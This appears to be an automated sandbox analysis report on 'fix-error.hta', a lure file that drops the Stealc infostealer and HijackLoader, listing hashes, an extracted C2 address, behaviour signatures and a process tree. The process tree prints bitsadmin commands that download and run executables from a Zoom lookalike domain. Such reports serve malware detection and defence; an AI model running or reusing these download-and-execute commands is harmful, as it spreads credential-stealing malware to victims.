Analysis

  • max time kernel
    125s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-10-2024 09:45

General

  • Target

    fix-error.hta

  • Size

    74KB

  • MD5

    acfba6ff2e80e0ebc80df9e7d326337c

  • SHA1

    fe28d5756815fdac31a744a2f11c075f5b1892bc

  • SHA256

    92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138

  • SHA512

    2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00

  • SSDEEP

    768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj

Malware Config

Extracted

Family

stealc

Botnet

sneprivate29

C2

http://95.182.97.58

Attributes
  • url_path

    /84b7b6f977dd1c65.php

Signatures

  • Detects HijackLoader (aka IDAT Loader) 1 IoCs
  • HijackLoader

    HijackLoader is a multistage loader first seen in 2023.

  • Stealc

    Stealc is an infostealer written in C++.

  • Blocklisted process makes network request 5 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Detected potential entity reuse from brand GOOGLE.
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fix-error.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID 1804
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2852
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /PID 1804
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2856
    • C:\Users\Admin\AppData\Local\Temp\stealc.exe
      "C:\Users\Admin\AppData\Local\Temp\stealc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2328
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2940
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 800
            5⤵
            • Program crash
            PID:2000
    • C:\Windows\SysWOW64\timeout.exe
      "C:\Windows\System32\timeout.exe" /T 2 /nobreak
      2⤵
      • System Location Discovery: System Language Discovery
      • Delays execution with timeout.exe
      PID:1924
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer secondDownloadJob /download /priority foreground https://us18web-zoom.us/ram.exe C:\Users\Admin\AppData\Local\Temp\ram.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2836
    • C:\Users\Admin\AppData\Local\Temp\ram.exe
      "C:\Users\Admin\AppData\Local\Temp\ram.exe"
      2⤵
        PID:1660

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\favicon[1].ico

      Filesize

      5KB

      MD5

      f3418a443e7d841097c714d69ec4bcb8

      SHA1

      49263695f6b0cdd72f45cf1b775e660fdc36c606

      SHA256

      6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

      SHA512

      82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

    • C:\Users\Admin\AppData\Local\Temp\7729aedd

      Filesize

      1.0MB

      MD5

      6e55da6f9c2e2d5938113bee8a2a2169

      SHA1

      8c64d720f95c1427155aec990e536edde887dcc5

      SHA256

      3042740a5872ec6f403da4cb6639625a21b357d7aeb5e065e058bac021e00782

      SHA512

      6a04ca7b341731897e1745d953b136e9e2a3c70fe9186aab7416cbbfdefa6775323f68c9d975ef180bbde363e4c58d897f8f29c1e8119ba56a8a41a844b3e5fd

    • memory/1736-43-0x0000000000100000-0x0000000000363000-memory.dmp

      Filesize

      2.4MB

    • memory/1736-53-0x0000000000100000-0x0000000000363000-memory.dmp

      Filesize

      2.4MB

    • memory/1736-50-0x0000000000100000-0x0000000000363000-memory.dmp

      Filesize

      2.4MB

    • memory/1736-49-0x0000000000100000-0x0000000000363000-memory.dmp

      Filesize

      2.4MB

    • memory/1736-45-0x0000000000100000-0x0000000000363000-memory.dmp

      Filesize

      2.4MB

    • memory/1736-44-0x0000000077460000-0x0000000077609000-memory.dmp

      Filesize

      1.7MB

    • memory/2328-23-0x0000000077460000-0x0000000077609000-memory.dmp

      Filesize

      1.7MB

    • memory/2328-37-0x0000000071980000-0x0000000071AF4000-memory.dmp

      Filesize

      1.5MB

    • memory/2328-22-0x0000000071980000-0x0000000071AF4000-memory.dmp

      Filesize

      1.5MB

    • memory/2328-21-0x0000000000400000-0x0000000000561000-memory.dmp

      Filesize

      1.4MB

    • memory/2940-41-0x0000000071980000-0x0000000071AF4000-memory.dmp

      Filesize

      1.5MB

    • memory/2940-40-0x0000000077460000-0x0000000077609000-memory.dmp

      Filesize

      1.7MB